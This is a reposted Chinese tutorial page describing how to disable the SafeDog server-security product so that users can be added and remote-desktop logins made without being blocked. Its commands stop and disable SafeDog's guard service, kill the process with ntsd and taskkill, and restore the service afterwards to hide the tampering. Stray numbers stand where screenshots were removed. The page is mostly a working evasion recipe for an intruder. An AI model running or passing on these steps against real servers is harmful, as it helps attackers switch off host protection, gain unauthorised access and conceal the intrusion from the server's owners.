技術(shù)員聯(lián)盟提供win764位系統(tǒng)下載,win10,win7,xp,裝機純凈版,64位旗艦版,綠色軟件,免費軟件下載基地!

當(dāng)前位置:主頁 > 教程 > 服務(wù)器類 >

安全狗下加用戶的又一方法

來源:技術(shù)員聯(lián)盟┆發(fā)布時間:2018-12-12 06:26┆點擊:

0×01 測試環(huán)境:

安全狗的進程:

.安全狗的服務(wù)

.開啟遠(yuǎn)程桌面守護

3

.遠(yuǎn)程登錄測試:

4

.安全狗攔截

5

0×02 直入主題:

命令行下操作

tasklist |find “Safe”

6


最后一個進程SafeDogGuardCenter.exe是關(guān)鍵,記下它的PID:1032

然后接連兩個指令

sc config SafedogGuardCenter start= disabled

7

ntsd -c q -pid 1032


1032是剛才記下的SafeDogGuardCenter.exe 的pid,這個進程是服務(wù)器守護的核心,沒了它,安全狗的服務(wù)器守護將沒有任何作用
效果:

9

10

然后?然后就沒有然后了~現(xiàn)在我們已經(jīng)可以為所欲為了

真想看然后?那我們就來調(diào)戲一下狗狗咯

11

折騰一下狗狗的進程

taskkill /f /t /im SafeDogUpdateCenter.exe /im SafeDogSiteIIS.exe /im SafeDogServerUI.exe

0×03 總結(jié)

旨在不依靠任何外部程序,終結(jié)安全狗的守護功能。
其中使用到的NTSD命令是系統(tǒng)自帶的【2008/win7 以上被微軟刪減了,需要自己上傳[XP的NTSD.EXE在system32目錄下]】
安全狗在網(wǎng)站的安全上做的還可以,對自身的安全卻完全沒有考慮,無力吐槽。。
核心命令就兩句話,順序不能出錯

sc config SafedogGuardCenter start= disabled

ntsd -c q -pid 1032

如果不先把安全狗的服務(wù)停掉,它就會不斷的重新啟動[兩秒重啟一次我會說?]

手尾:退出遠(yuǎn)程登錄之后,最好把狗狗的服務(wù)改回來

sc config SafedogGuardCenter start= auto

然后狗狗的服務(wù)會自己恢復(fù)原狀的